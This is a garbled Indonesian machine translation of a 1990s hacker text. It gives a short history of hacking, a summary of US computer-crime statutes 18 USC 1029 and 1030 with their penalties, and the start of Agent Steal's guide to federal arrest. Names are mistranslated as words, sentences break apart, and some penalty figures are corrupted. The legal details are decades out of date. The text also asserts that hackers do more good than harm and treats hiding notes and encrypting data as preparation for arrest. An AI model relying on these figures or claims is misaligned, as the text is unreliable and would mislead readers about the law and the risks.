Di awal tahun 80-an peretas suka sekali berbuat iseng. Joe College duduk di terminal bisu ke Universitas
DEC 10 dan memutuskan untuk melihat-lihat jaringan kampus. Inilah Star Trek! Inilah Petualangan! Zork! Hmm,
apa program yang disebut Seks ini? Dia yang menjalankannya. Sebuah pesan muncul: "Peringatan: bermain seks berbahaya.
Anda yakin ingin bermain? Y / T "Siapa yang bisa menolak? Dengan" Y "layar meledak menjadi tampilan
Karakter ASCII, kemudian muncul pesan: "Sedang menghapus semua file di akun ini." Joe
menangis, mengutuk, melompat-lompat. Dia memberi perintah file daftar. Tidak ada! Nihil! Nada! Dia lari ke
sysadmin. Mereka masuk kembali ke akunnya tetapi semua file-nya masih ada. Sebuah lelucon.

Halaman 48
Pada tahun 1983 peretas hampir semua orang iseng yang tidak berbahaya, orang-orang yang menjaga jarak dari orang-orang yang
melanggar
hukum. "File Jargon" MIT mendefinisikan hacker hanya sebagai "orang yang suka belajar tentang komputer
sistem dan cara memperluas kemampuan mereka; seseorang yang memprogram dengan antusias dan menikmati
mendedikasikan banyak waktu dengan komputer. "
1983 IBM Personal Computer memasuki panggung yang ditenagai oleh sistem operasi MS-DOS Bill Gates. Itu
kerajaan sistem operasi CP / M jatuh. Dalam dua tahun ke depan pada dasarnya semua komputer mikro
sistem operasi kecuali MS-DOS dan yang ditawarkan oleh Apple akan mati, dan seribu Lembah Silikon
nasib karam. Amiga bergantung pada seutas benang. Harga merosot, dan segera semua peretas menghargai diri sendiri
memiliki komputer mereka sendiri. Menyelinap di sekitar laboratorium kampus di malam hari memudar dari tempat kejadian.
Pada 1984 Emmanuel Goldstein meluncurkan 2600: Peretas Peretas dan geng peretas Legiun Doom
formulir. Kongres meloloskan Undang-Undang Pengendalian Kejahatan Komprehensif yang memberikan yurisdiksi Dinas
Rahasia AS
penipuan komputer. Fred Cohen, di Carnegie Melon University menulis tesis PhD-nya tentang merek baru, tidak pernah
mendengar hal yang disebut virus komputer.
1984. Itu akan menjadi tahun, pikir jutaan penggemar Orwell, bahwa pemerintah akhirnya akan mendapatkan tangannya
pada teknologi yang cukup tinggi untuk menjadi Big Brother. Sebaliknya, penulis fiksi ilmiah William Gibson, menulis
Neuromancer pada mesin tik manual, memberikan istilah dan melukiskan gambar "ruang maya." "Kasing adalah
terbaik ... yang pernah berlari dalam matriks komputer Bumi. Lalu dia menggandakan orang yang salah ... "
Pada tahun 1984, sistem papan buletin "menyengat" kepolisian AS pertama kali muncul.
Sejak 1985, Phrack
telah memberikan komunitas hacker dengan informasi tentang sistem operasi, jaringan
teknologi, dan telepon, serta menyampaikan topik menarik lainnya ke komputer internasional
bawah tanah.
80-an adalah era perang dialer. Meskipun ARPAnet dan jaringan X.25, sebagian besar komputer bisa
hanya dapat diakses dengan menemukan saluran telepon masing-masing. Jadi salah satu hadiah paling berharga dari
Peretas 80-an adalah nomor telepon ke beberapa komputer misterius.
Komputer era ini mungkin menjalankan salah satu dari puluhan sistem operasi misterius dan menggunakan banyak
protokol komunikasi. Manual untuk sistem ini seringkali dirahasiakan. Adegan hacker beroperasi di Internet
prinsip mentor. Kecuali Anda dapat menemukan seseorang yang akan memasukkan Anda ke lingkaran dalam geng peretas
yang telah mengumpulkan dokumen yang diselamatkan dari tempat sampah atau dicuri dalam pencurian, Anda jauh di belakang
Pak. Kevin Poulson membuat nama untuk dirinya sendiri melalui banyak perampokan Pasifik Bell yang berani.
Terlepas dari hambatan-hambatan ini, pada tahun 1988 peretasan telah memasuki masa yang besar. Menurut daftar grup peretas
disusun oleh editor Phrack pada 8 Agustus 1988, AS menampung ratusan dari mereka.
Secret Service secara video merekam konvensi SummerCon 1988.
Pada 1988, Robert Tappan Morris, putra kepala ilmuwan NSA, Robert Morris Sr., menulis sebuah eksploit
selamanya dikenal sebagai Worm Morris. Ini menggunakan kombinasi eksploitasi jari dan sendmail untuk membobol a
komputer, salin sendiri dan kemudian kirim salin setelah salin ke komputer lain. Morris, dengan sedikit
pemahaman tentang kekuatan replikasi eksponensial ini, melepaskannya ke Internet. Segera rentan
komputer diisi ke insang digital mereka dengan cacing dan menyumbat tautan komunikasi saat mereka mengirim salinan
cacing keluar untuk berburu komputer lain. Internet muda, maka hanya beberapa ribu komputer yang kuat,
crash. Morris ditangkap, tetapi pergi dengan masa percobaan.
1990 adalah tahun penting berikutnya untuk Internet, sama pentingnya dengan 1980 dan peluncuran TCP / IP. Terinspirasi oleh
Nelson's Xanadu, Tim Berners-Lee dari Laboratorium Eropa untuk Fisika Partikel (CERN) mengandung dari a
cara baru untuk mengimplementasikan hiperteks. Dia menyebutnya World Wide Web. Pada tahun 1991 ia diam-diam
melepaskannya di Internet
dunia. Dunia maya tidak akan pernah sama. Xanadu Nelson, seperti Plato, seperti CP / M, memudar.

Halaman 49
1990 juga merupakan tahun jumlah serangan dan penangkapan hacker yang belum pernah terjadi sebelumnya. Dinas Rahasia AS
dan Baru
Polisi Negara Bagian York menyerang Phiber Optik, Acid Phreak, dan Scorpion di New York City, dan menangkap Terminus,
Nabi, Kiri, dan Urvile.
Gugus Tugas Chicago menangkap Knight Lightning dan menyerang Robert Izenberg, Mentor, dan Erik Bloodaxe. Saya t
menyerang rumah dan bisnis Richard Andrews. Dinas Rahasia AS dan Arizona Organized Crime and
Racketeering Bureau melakukan operasi Sundevil razia di Cincinnatti, Detroit, Los Angeles, Miami, Newark,
Phoenix, Pittsburgh, Richmond, Tucson, San Diego, San Jose, dan San Francisco. Yang terkenal tidak masuk akal
serangan tahun itu adalah invasi Chicago Task Force dari Steve Jackson Games, Inc.
Juni 1990 Mitch Kapor dan John Perry Barlow bereaksi terhadap ekses semua penggerebekan ini untuk menemukan
Yayasan Electronic Frontier. Tujuan awalnya adalah untuk melindungi peretas. Mereka berhasil mendapatkan hukum
penegakan untuk mundur dari komunitas peretas.
Pada tahun 1993, Marc Andreesson dan Eric Bina dari National Center for Supercomputing Applications merilis
Mosaic, browser WWW pertama yang dapat menampilkan grafik. Akhirnya, setelah menghilang dari Plato dua puluh
tahun lalu, kami memiliki grafis yang layak! Kali ini, bagaimanapun, grafik ini ada di sini untuk tinggal. Segera Web
menjadi cara nomor satu yang dibanggakan oleh peretas dan menyebarkan kode untuk eksploitasi mereka. Papan pengumuman,
dengan rahasia mereka yang dipegang erat, menghilang dari tempat kejadian.
Pada tahun 1993, Def Con pertama menyerang Las Vegas. Era kontra hacker bergerak sepenuhnya dengan Beyond
Harapan seri, HoHocon dan banyak lagi.
1996 Aleph One mengambil alih daftar email Bugtaq dan mengubahnya menjadi komputer "pengungkapan penuh" publik
pertama
daftar keamanan. Untuk pertama kalinya dalam sejarah, kelemahan keamanan yang dapat digunakan untuk masuk ke komputer
sedang terjadi
dibahas secara terbuka dan dengan kode exploit lengkap. Arsip Bugtraq ditempatkan di Web.
Pada bulan Agustus 1996 saya mulai mengirimkan Panduan ke (kebanyakan) Peretasan Tidak Berbahaya. Mereka penuh dengan
instruksi sederhana
dirancang untuk membantu pemula memahami peretasan. Sejumlah peretas maju untuk membantu menjalankan apa yang
menjadi
Happy Hacker Digest.
1996 juga merupakan tahun ketika dokumentasi untuk router, sistem operasi, protokol TCP / IP dan banyak lagi
lebih banyak mulai berkembang biak di Web. Era perampokan berani manual teknis memudar.
Pada awal 1997 para pembaca Bugtraq mulai merobek sistem operasi Windows NT menjadi tercabik-cabik. Surat baru
daftar, NT Bugtraq, diluncurkan hanya untuk menangani tingginya volume kelemahan keamanan NT yang ditemukan oleh
pembacanya.
Peretas yang mengaku sebagai diri sendiri, Mudge dan Weld dari The L0pht, dalam sebuah tur penelitian, menulis dan merilis
sebuah
cracker kata sandi untuk WinNT yang menggetarkan Internet. Banyak komunitas keamanan komputer telah datang
cukup jauh sekarang untuk menyadari bahwa Mudge dan Weld melakukan pemilik jaringan NT yang hebat
layanan.
Berkat kesediaan peretas untuk membagikan pengetahuan mereka di Web, dan daftar mail seperti Bugtraq,
NT Bugtraq dan Happy Hacker, hari-hari orang harus meminta untuk dilantik menjadi geng hacker
untuk mempelajari rahasia peretasan sekarang memudar.
Di mana selanjutnya dunia peretas akan berkembang? Anda memegang jawabannya di tangan Anda.
Isi Volume Kejahatan:
Masalah Hukum Kejahatan Komputer # 1
Segala sesuatu yang perlu diketahui oleh peretas tentang tertangkap oleh FBI
____________________________________________________________

Halaman 50
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Masalah Hukum Kejahatan Komputer # 1
Oleh Peter Thiruselvam <pselvam@ix.netcom.com> dan Carolyn Meinel
____________________________________________________________
Bosan membaca semua catatan "Anda bisa masuk penjara" dalam panduan ini? Siapa bilang itu kejahatan?
Nah, sekarang Anda bisa mendapatkan yang pertama dari serangkaian Panduan ke detail mengerikan tentang hukum apa yang
kami coba
membuat Anda tidak sengaja melanggar, dan siapa yang akan menghancurkan Anda jika Anda tetap melanjutkan kejahatan itu.
Panduan ini mencakup dua undang-undang kejahatan komputer Federal AS yang paling penting: 18 USC, Bab 47, Bagian
1029, dan Bagian 1030, dikenal sebagai "Computer Fraud and Abuse Act of 1986."
Sekarang ini bukan * hanya * hukum kejahatan komputer. Hanya saja inilah dua hukum terpenting yang digunakan
di Pengadilan Federal AS untuk menempatkan penjahat komputer di balik jeruji besi.
KEJAHATAN KOMPUTER: BAGAIMANA UMUM? Seberapa sering mereka dilaporkan?
Pasukan Kejahatan Komputer FBI nasional memperkirakan bahwa antara 85 dan 97 persen gangguan komputer
bahkan tidak terdeteksi. Dalam tes terbaru yang disponsori oleh Departemen Pertahanan, statistiknya adalah
menakjubkan. Upaya dilakukan untuk menyerang total 8932 sistem yang berpartisipasi dalam pengujian. 7860 dari mereka
sistem berhasil ditembus. Manajemen hanya 390 dari 7860 sistem yang terdeteksi
serangan, dan hanya 19 manajer yang melaporkan serangan (Richard Power, -Current dan Future Bahaya: A
CSI Primer tentang Kejahatan Komputer dan Perang Informasi_, Computer Security Institute, 1995.)
Alasan mengapa begitu sedikit serangan dilaporkan adalah "terutama karena organisasi sering takut pada karyawan mereka,
klien, dan pemegang saham akan kehilangan kepercayaan pada mereka jika mereka mengakui bahwa komputer mereka telah
diserang. "
Selain itu, dari kejahatan komputer * yang * dilaporkan, sedikit yang bisa diselesaikan.
JADI, APAKAH HACKERS PENYEBAB BESAR BENCANA KOMPUTER?
Menurut Institut Keamanan Komputer, ini adalah jenis kejahatan komputer dan kerugian lainnya:
· Kesalahan manusia - 55%
· Masalah keamanan fisik - 20% (mis. Bencana alam, masalah listrik)
· Serangan oleh orang dalam dilakukan untuk mendapatkan keuntungan dari kejahatan komputer - 10%
· Karyawan yang tidak puas ingin membalas dendam - 9%
· Virus - 4%
· Serangan luar - 1-3%
Jadi, ketika Anda menganggap bahwa banyak serangan dari luar berasal dari penjahat komputer profesional - banyak
Di antaranya adalah karyawan dari pesaing para korban, peretas bertanggung jawab untuk hampir tidak ada kerusakan sama
sekali
ke komputer.
Faktanya, rata-rata, sudah menjadi pengalaman kami bahwa peretas melakukan jauh lebih baik daripada merugikan.
Ya, kami katakan bahwa hacker rekreasi yang hanya suka bermain-main dengan komputer orang lain
bukan orang yang harus ditakuti. Jauh lebih mungkin menjadi orang yang mengenakan jas yang merupakan karyawan korbannya.
Tetapi Anda tidak akan pernah mengetahuinya dari media, bukan?
GAMBARAN UMUM HUKUM FEDERAL AS
Secara umum, kejahatan komputer melanggar hukum federal ketika jatuh ke dalam salah satu kategori ini:

Halaman 51
· Ini melibatkan pencurian atau kompromi pertahanan nasional, hubungan luar negeri, energi atom, atau pembatasan lainnya
informasi.
· Ini melibatkan komputer yang dimiliki oleh departemen atau agen pemerintah AS.
· Ini melibatkan bank atau kebanyakan jenis lembaga keuangan lainnya.
· Ini melibatkan komunikasi antar negara atau asing.
· Melibatkan orang atau komputer di negara bagian atau negara lain.
Dari pelanggaran-pelanggaran ini, FBI biasanya memiliki yurisdiksi atas kasus-kasus yang melibatkan keamanan nasional,
terorisme,
perbankan, dan kejahatan terorganisir. Dinas Rahasia AS memiliki yurisdiksi setiap kali Departemen Keuangan
menjadi korban atau setiap kali komputer diserang yang tidak berada di bawah yurisdiksi FBI atau Dinas Rahasia AS
(misalnya, dalam kasus pencurian kata sandi atau kode akses). Dalam kasus federal tertentu, Departemen pabean,
Departemen Perdagangan, atau organisasi militer, seperti Kantor Investigasi Angkatan Udara, mungkin memiliki
yurisdiksi.
Di Amerika Serikat, sejumlah undang-undang federal melindungi terhadap serangan pada komputer, penyalahgunaan kata sandi,
invasi elektronik atas privasi, dan pelanggaran lainnya. The Computer Fraud and Abuse Act tahun 1986 adalah
bagian utama dari undang-undang yang mengatur kejahatan komputer paling umum, meskipun banyak hukum lain mungkin
digunakan untuk menuntut berbagai jenis kejahatan komputer. Undang-undang tersebut mengubah Judul 18 Kode Amerika
Serikat §1030. Saya t
juga melengkapi Undang-Undang Privasi Komunikasi Elektronik tahun 1986, yang melarang yang tidak berwenang
intersepsi komunikasi digital dan baru saja disahkan. Penyalahgunaan Komputer
Amendemen Act of 1994 memperluas Act 1986 untuk mengatasi penularan virus dan berbahaya lainnya
kode.
Selain hukum federal, sebagian besar negara bagian telah mengadopsi hukum kejahatan komputer mereka sendiri. Sejumlah
negara di luar Amerika Serikat juga telah meloloskan undang-undang yang mendefinisikan dan melarang kejahatan komputer.
THE BIG NO NO'S - DUA HUKUM KRIME FEDERAL PALING PENTING
Seperti disebutkan di atas, dua undang-undang kejahatan komputer federal AS yang paling penting adalah 18 USC: Bab 47,
Bagian 1029 dan 1030.
BAGIAN 1029
Bagian 1029 melarang penipuan dan aktivitas terkait yang dimungkinkan oleh perangkat akses palsu seperti
PIN, kartu kredit, nomor rekening, dan berbagai jenis pengidentifikasi elektronik. Sembilan area kriminal
kegiatan yang dicakup oleh Bagian 1029 tercantum di bawah ini. Semua * memerlukan * bahwa pelanggaran yang terlibat
antarnegara bagian atau
perdagangan luar negeri.
1. Memproduksi, menggunakan, atau memperdagangkan perangkat akses palsu. (Pelanggaran harus dilakukan dengan sadar
dan dengan maksud untuk menipu.)
Penalti: Denda $ 50.000 atau dua kali nilai kejahatan dan / atau hingga 15 tahun penjara, $ 100.000 dan / atau hingga
20 tahun jika diulangi pelanggaran.
2. Menggunakan atau memperoleh perangkat akses yang tidak sah untuk mendapatkan sesuatu yang bernilai total $ 1000 atau
lebih
selama periode satu tahun. (Pelanggaran harus dilakukan secara sadar dan dengan maksud untuk menipu.)
Penalti: Denda $ 10.000 atau dua kali nilai kejahatan dan / atau hingga 10 tahun penjara, $ 100.000 dan / atau hingga
20 tahun jika diulangi pelanggaran.
3. Memiliki 15 atau lebih perangkat akses palsu atau tidak sah. (Pelanggaran harus dilakukan
secara sadar dan dengan maksud untuk menipu.)

Halaman 52
Penalti: Denda $ 10.000 atau dua kali nilai kejahatan dan / atau hingga 10 tahun penjara, $ 100.000 dan / atau hingga
20 tahun jika diulangi pelanggaran.
4. Memproduksi, memperdagangkan, atau memiliki peralatan pembuat perangkat. (Pelanggaran harus dilakukan
secara sadar dan dengan maksud untuk menipu.)
Penalti: Denda $ 50.000 atau dua kali nilai kejahatan dan / atau hingga 15 tahun penjara, $ 1.000.000
dan / atau hingga 20 tahun jika pelanggaran berulang.
5. Mempengaruhi transaksi dengan perangkat akses yang dikeluarkan kepada orang lain untuk menerima pembayaran atau
sesuatu yang bernilai total $ 1000 atau lebih selama periode satu tahun. (Pelanggaran harus dilakukan
secara sadar dan dengan maksud untuk menipu.)
Hukuman: Denda 10, atau dua kali nilai kejahatan dan / atau hingga 10 tahun penjara, 100.000 dan / atau hingga 20 tahun
tahun jika mengulangi pelanggaran.
6. Meminta seseorang dengan tujuan menawarkan perangkat akses atau menjual informasi yang dapat digunakan untuk itu
dapatkan perangkat akses. (Pelanggaran harus dilakukan secara sadar dan dengan maksud untuk menipu, dan
tanpa izin penerbit perangkat akses.)
Penalti: Denda $ 50.000 atau dua kali nilai kejahatan dan / atau hingga 15 tahun penjara, $ 100.000 dan / atau hingga
20 tahun jika diulangi pelanggaran.
7. Menggunakan, memproduksi, memperdagangkan, atau memiliki instrumen telekomunikasi yang telah dimodifikasi atau
diubah untuk mendapatkan penggunaan layanan telekomunikasi yang tidak sah. (Pelanggaran harus dilakukan
secara sadar dan dengan maksud untuk menipu.)
Ini akan mencakup penggunaan "Kotak Merah," "Kotak Biru" (ya, mereka masih bekerja di beberapa jaringan telepon) dan
ponsel kloning ketika pemilik sah ponsel yang telah Anda kloning belum setuju
dikloning.
Penalti: Denda $ 50.000 atau dua kali nilai kejahatan dan / atau hingga 15 tahun penjara, $ 100.000 dan / atau hingga
20 tahun jika diulangi pelanggaran.
8. Menggunakan, memproduksi, memperdagangkan, atau memiliki penerima pemindaian atau perangkat keras atau perangkat
lunak yang digunakan untuk mengubah atau
memodifikasi instrumen telekomunikasi untuk mendapatkan akses tidak sah ke layanan telekomunikasi.
Ini melarang pemindai yang biasa digunakan orang untuk mengintip panggilan telepon seluler. Kami baru saja besar
skandal ketika media berita mendapat telepon seluler yang dicegat dari Ketua DPR AS
Perwakilan Newt Gingrich.
Penalti: Denda $ 50.000 atau dua kali nilai kejahatan dan / atau hingga 15 tahun penjara, $ 100.000 dan / atau lebih tinggi
hingga 20 tahun jika diulangi pelanggaran.
9. Menyebabkan atau mengatur agar seseorang hadir, kepada anggota sistem kartu kredit atau agennya untuk pembayaran,
catatan transaksi yang dilakukan oleh perangkat akses. (Pelanggaran harus dilakukan dengan sadar dan dengan
niat untuk menipu, dan tanpa izin dari anggota sistem kartu kredit atau agennya.
Penalti: Denda $ 10.000 atau dua kali nilai kejahatan dan / atau hingga 10 tahun penjara, $ 100.000 dan / atau hingga
20 tahun jika diulangi pelanggaran.
BAGIAN 1030

Halaman 53
18 USC, Bab 47, Bagian 1030, disahkan sebagai bagian dari Computer Fraud and Abuse Act tahun 1986, melarang
akses tidak sah atau curang ke komputer pemerintah, dan menetapkan hukuman untuk akses tersebut.
Tindakan ini adalah salah satu dari sedikit undang-undang federal yang hanya berkaitan dengan komputer. Di bawah
Computer Fraud and Abuse Act, US Secret Service, dan FBI secara eksplisit telah diberikan yurisdiksi
untuk menyelidiki pelanggaran yang ditentukan dalam tindakan ini.
Enam bidang kegiatan kriminal yang dicakup oleh Bagian 1030 adalah:
1. Memperoleh pertahanan nasional, hubungan luar negeri, atau informasi energi atom terbatas dengan maksud atau
alasan untuk percaya bahwa informasi tersebut dapat digunakan untuk melukai Amerika Serikat atau untuk keuntungan apa pun
bangsa asing. (Pelanggaran harus dilakukan secara sadar dengan mengakses komputer tanpa otorisasi
atau melebihi akses resmi.)
2. Memperoleh informasi dalam catatan keuangan lembaga keuangan atau penerbit kartu, atau informasi tentang a
konsumen dalam file agen pelaporan konsumen. (Pelanggaran harus dilakukan dengan sengaja oleh
mengakses komputer tanpa otorisasi atau melebihi akses resmi.)
Catatan penting: baru-baru ini di daftar peretas dc-stuff seorang rekan yang namanya tidak akan kami ulangi klaim
telah "meretas TRW" untuk mendapatkan laporan tentang seseorang yang dia posting ke daftar. Kami berharap orang ini
berbohong
dan cukup membayar biaya untuk membeli laporan.
Penalti: Denda dan / atau sampai 1 tahun penjara, hingga 10 tahun jika pelanggaran berulang.
3. Mempengaruhi komputer secara eksklusif untuk penggunaan departemen atau lembaga pemerintah AS atau, jika tidak
eksklusif, yang digunakan untuk pemerintah di mana pelanggaran berdampak buruk terhadap penggunaan pemerintah
pengoperasian komputer. (Pelanggaran harus dilakukan dengan sengaja dengan mengakses komputer tanpa
otorisasi.)
Ini bisa berlaku untuk syn banjir dan ping pembunuh serta penolakan serangan layanan lainnya, serta melanggar
ke komputer dan main-main. Harap ingat untuk berjingkat-jingkat di sekitar komputer dengan domain .mil atau .gov
nama!
Penalti: Denda dan / atau sampai 1 tahun penjara, hingga 10 tahun jika pelanggaran berulang.
4. Menindaklanjuti penipuan dengan mengakses komputer minat federal dan mendapatkan sesuatu yang bernilai, kecuali jika
penipuan dan hal yang didapat hanya terdiri dari penggunaan komputer. (Pelanggaran harus dilakukan
sadar, dengan maksud untuk menipu, dan tanpa otorisasi atau melebihi otorisasi.) [Pemerintah
pandangan "komputer minat federal" didefinisikan di bawah ini]
Awas! Bahkan jika Anda mengunduh salinan program hanya untuk mempelajarinya, hukum ini berarti jika pemiliknya
Program mengatakan, "Ya, saya akan mengatakan itu bernilai satu juta dolar," Anda dalam masalah besar.
Penalti: Denda dan / atau sampai 5 tahun penjara, hingga 10 tahun jika pelanggaran berulang.
5. Melalui penggunaan komputer yang digunakan dalam perdagangan antarnegara bagian, dengan sengaja menyebabkan
transmisi a
program, informasi, kode, atau perintah ke sistem komputer. Ada dua skenario terpisah:
Sebuah. Dalam skenario ini, (I) orang yang menyebabkan transmisi bermaksud merusak komputer atau menolak penggunaan
untuk itu; dan (ii) transmisi terjadi tanpa seizin pemilik atau operator komputer, dan
menyebabkan $ 1000 atau lebih dalam kehilangan atau kerusakan, atau memodifikasi atau merusak, atau berpotensi
memodifikasi atau merusak, medis
perawatan atau pemeriksaan.
Cara paling umum seseorang mendapat masalah dengan bagian hukum ini adalah ketika mencoba menutupi jejak
setelah membobol komputer. Saat mengedit atau, lebih buruk lagi, menghapus berbagai file, si penyusup mungkin

Halaman 54
secara tidak sengaja menghapus sesuatu yang penting. Atau perintah yang dia berikan mungkin secara tidak sengaja
mengacaukan segalanya.
Ya, coba saja buktikan itu kecelakaan. Tanyakan kepada administrator sistem tentang memberikan perintah sebagai
akar. Bahkan ketika Anda tahu komputer seperti punggung tangan Anda, terlalu mudah untuk mengacaukannya.
Serangan bom email sederhana, "killer ping," flo ping, syn banjir, dan sejumlah besar Windows NT
eksploitasi ketika mengirim perintah sederhana ke banyak port-nya menyebabkan crash juga bisa melanggar hukum ini. Begitu
bahkan jika Anda seorang peretas pemula, beberapa eksploit yang paling sederhana dapat membuat Anda dalam masalah besar!
Hukuman dengan maksud untuk menyakiti: Denda dan / atau sampai 5 tahun penjara, hingga 10 tahun jika diulangi pelanggaran.
b. Dalam skenario ini, (I) orang yang menyebabkan transmisi tidak bermaksud kerusakan tetapi beroperasi dengan
sembrono mengabaikan risiko bahwa transmisi akan menyebabkan kerusakan pada pemilik komputer atau operator,
dan menyebabkan $ 1000 atau lebih kerugian atau kerusakan, atau memodifikasi atau merusak, atau berpotensi memodifikasi
atau merusak, a
perawatan atau pemeriksaan medis.
Ini berarti bahwa meskipun Anda dapat membuktikan bahwa Anda telah merusak komputer secara tidak sengaja, Anda masih
dapat dipenjara.
Hukuman karena bertindak dengan mengabaikan sembrono: Denda dan / atau sampai 1 tahun penjara.
6. Menindaklanjuti penipuan dengan memperdagangkan kata sandi atau informasi serupa yang memungkinkan komputer terjadi
diakses tanpa otorisasi, jika perdagangan tersebut mempengaruhi perdagangan antar negara bagian atau asing atau jika komputer
terkena dampak digunakan oleh atau untuk pemerintah. (Pelanggaran harus dilakukan secara sadar dan dengan maksud untuk
menipu.)
Cara yang umum untuk melanggar bagian hukum ini berasal dari keinginan untuk bermegah. Ketika seorang hacker menemukan
cara untuk melakukannya
menyelinap ke komputer orang lain, bisa sangat menggoda untuk memberikan kata sandi kepada orang lain. Cantik
segera puluhan pemula yang tidak mengerti dengan sembarangan mengotak-atik komputer korban. Mereka juga membanggakan.
Sebelum Anda menyadarinya, Anda berada dalam kesulitan besar.
Penalti: Denda dan / atau sampai 1 tahun penjara, hingga 10 tahun jika pelanggaran berulang.
Re: # 4 Bagian 1030 mendefinisikan komputer minat federal sebagai berikut:
1. Komputer yang khusus digunakan untuk lembaga keuangan [didefinisikan di bawah] atau pemerintah AS atau,
jika tidak eksklusif, yang digunakan untuk lembaga keuangan atau pemerintah AS di mana pelanggarannya merugikan
mempengaruhi penggunaan operasi komputer oleh lembaga keuangan atau pemerintah; atau
2. Komputer yang merupakan salah satu dari dua atau lebih komputer yang digunakan untuk melakukan pelanggaran, tidak
semuanya berada
dalam kondisi yang sama.
Bagian ini mendefinisikan lembaga keuangan sebagai berikut:
1. Lembaga dengan simpanan yang diasuransikan oleh Federal Deposit Insurance Corporation (FDIC).
2. Federal Reserve atau anggota Federal Reserve, termasuk Federal Reserve Bank.
3. Serikat kredit dengan akun yang diasuransikan oleh Administrasi Serikat Kredit Nasional.
4. Anggota sistem bank pinjaman rumah federal dan bank pinjaman rumah apa pun.
5. Setiap institusi dari sistem Kredit Pertanian di bawah Undang-Undang Kredit Pertanian tahun 1971.
6. Pedagang perantara yang terdaftar di Komisi Sekuritas dan Bursa (SEC) dalam aturan bagian
15 UU SEC tahun 1934.

Halaman 55
7. Perusahaan Perlindungan Investor Efek.
8. Cabang atau agensi bank asing (sebagaimana didefinisikan dalam Undang-Undang Perbankan Internasional 1978).
9. Suatu organisasi yang beroperasi berdasarkan bagian 25 atau 25 (a) Undang-Undang Federal Re-layan.
SIAPA YANG MEMBERI BUSTING CRACKER YANG MENDAPATKAN BIT FROGGY TENTANG BAGIAN
1030?
(FBI singkatan dari Federal Bureau of Investigation, USSS for US Secret Service)
Bagian Hukum Jenis Informasi
Yurisdiksi
1030 (a) (1)
Keamanan Nasional, FBI USSS JOINT
Pertahanan Nasional
X
1030 (a) (2) Hubungan luar negeri
X
Energi atom terbatas
X
1030 (a) (2) Keuangan atau konsumen
Catatan keuangan
X
bank, keuangan lainnya
institusi
Catatan keuangan
penerbit kartu
X
Informasi tentang konsumen
dalam file konsumen
agen pelaporan
X
Keuangan non-bank
institusi
X
1030 (a) (3) Komputer pemerintah
Pertahanan Nasional
X
Hubungan luar negeri
X
Data terbatas
X
Gedung Putih
X
Semua pemerintah lainnya
komputer
X
1030 (a) (4) Komputer dengan minat federal:
Niat untuk menipu
X
1030 (a) (5) (A) Transmisi program, perintah:
Dimaksudkan untuk merusak atau menolak penggunaan
X
1030 (a) (5) (B) Transmisi dari program, perintah:
Mengabaikan sembarangan
X
1030 (a) (6) Perdagangan kata sandi:
Perdagangan antar negara atau asing
X
Komputer digunakan oleh atau untuk pemerintah
X
Halaman 56
Mengenai 1030 (a) (2): FBI memiliki yurisdiksi atas pelanggaran penipuan bank, yang termasuk kategori (1)
melalui (5) dalam daftar lembaga keuangan yang ditentukan di atas. Secret Service dan FBI berbagi bersama
yurisdiksi atas lembaga keuangan non-bank yang didefinisikan dalam kategori (6) dan (7) dalam daftar keuangan
institusi yang didefinisikan di atas.
Mengenai 1030 (a) (3) Komputer Pemerintah: FBI adalah agen investigasi utama untuk pelanggaran
bagian ini ketika itu melibatkan pertahanan nasional. Informasi yang berkaitan dengan hubungan luar negeri, dan lainnya
data terbatas. Akses tidak sah ke informasi lain di komputer pemerintah berada di bawah yang utama
yurisdiksi Dinas Rahasia.
MORAL: CONFUCIUS KATAKAN: "CRACKER YANG MENDAPATKAN BUSTED MELAKUKAN SALAH SATU
KEJAHATAN INI, AKAN
Habiskan WAKTU PANJANG DI SOUP JAILHOUSE. "
Informasi ini diambil dari _Computer Crime: A Crimefighter's Handbook_ (Icove, Seger &
VonStorch. O'Reilly & Associates, Inc.)
Berikut ini adalah panduan Agen Mencuri untuk apa yang akan dihadapi jika seseorang ditangkap di AS karena kejahatan
komputer.
Peretas kriminal akan mencoba meyakinkan Anda bahwa jika Anda elit, Anda tidak akan tertangkap. Tetapi sebagai Agen
Mencuri dan
begitu banyak orang lain telah belajar, tidak mudah untuk pergi dengan barang-barang.
-------------------------------------------------- --------------
SEGALA SESUATU YANG HACKER PERLU TAHU TENTANG MENDAPATKAN OLEH FEDS
-------------------------------------------------- --------------
Ditulis Oleh Agen Mencuri (Dari Federal Pris, 1997)
Email Internet, agentsteal@usa.net
Kontribusi dan pengeditan oleh Minor Threat dan Netta Gilboa
Terima kasih khusus kepada Evian S. Sim
Artikel ini dapat diperbanyak secara bebas, seluruhnya atau sebagian, asalkan ucapan terima kasih diberikan kepada
penulis. Reproduksi apa pun demi laba, timpang zine, (artinya Anda t0mmy, el8, Anda pencuri) atau penegak hukum
penggunaan dilarang. Penulis dan kontributor pada filet ini sama sekali tidak mendukung perilaku kriminal.
----------------
ISI
----------------
BAGIAN I - HUKUM KRIMINAL FEDERAL
Kata Pengantar
pengantar
A. Perilaku yang Relevan
B. Mempersiapkan Diri untuk Percobaan
C. Perjanjian dan Pengacara Permohonan
D. Konspirasi
E. Hukuman
F. Penggunaan Keterampilan Khusus
G. Mendapatkan Jaminan
H. State v. Biaya Federal
I. Bekerja Sama
J. Masih Memikirkan Uji Coba
K. Pencarian dan Penyitaan
L. Pengawasan

Halaman 57
M. Investigasi Kehadiran
N. Prosiding Pro Se
O. Pemeriksaan Pendengaran
P. Pengembalian Properti
Q. Waran Luar Biasa
R. Enkripsi
Ringkasan S.
BAGIAN II - PENJARA FEDERAL
A. Negara v. Federal
B. Tingkat Keamanan
C. Mulai Ditunjuk
D. Narapidana yang Tidak Tahu
E. Populasi
F. Melakukan Waktu
G. Tindakan Disiplin
H. Obat Administratif
I. Petugas Penjara
J. The Hole
K. Waktu yang Baik
L. Halfway House
M. Rilis yang diawasi
N. Ringkasan
KATA PENGANTAR
Tidak ada yang ingin terlibat dalam kasus pidana dan saya belum pernah bertemu seorang hacker yang sepenuhnya siap untuk itu
terjadi pada mereka. Ada ribuan kertas dan majalah elektronik, CD-ROM, halaman web dan teks
file tentang peretas dan peretasan tersedia, namun tidak ada yang dicetak sampai sekarang yang secara khusus membahas
apa yang harus dilakukan ketika penangkapan benar-benar terjadi pada Anda. Kebanyakan peretas tidak merencanakan
penangkapan dengan menyembunyikan mereka
catatan atau mengenkripsi data mereka, dan sebagian besar dari mereka memiliki semacam buku alamat yang disita juga dari
mereka
paling terkenal yang masih tersisa yang disita dari The Not So Humble Babe). Kebanyakan dari mereka tidak diberitahu
